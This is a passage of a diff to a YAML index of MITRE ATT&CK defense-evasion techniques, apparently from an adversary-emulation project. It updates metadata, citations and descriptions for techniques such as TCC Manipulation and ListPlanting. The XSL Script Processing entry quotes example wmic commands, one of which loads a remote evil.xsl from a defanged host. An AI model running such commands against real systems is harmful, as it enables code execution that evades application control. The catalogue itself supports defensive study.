         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -12805,7 +13116,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -12855,7 +13165,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -12910,12 +13219,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -12965,12 +13273,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13030,8 +13337,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13048,37 +13355,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13086,6 +13374,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13093,7 +13383,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13123,7 +13413,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13169,7 +13458,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13214,8 +13503,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13260,7 +13547,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13274,58 +13561,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13342,6 +13599,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13356,21 +13616,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13415,9 +13706,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13474,8 +13764,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13484,57 +13774,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13552,29 +13796,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13607,7 +13895,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -13635,48 +13923,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13685,6 +13936,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -13693,20 +13947,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
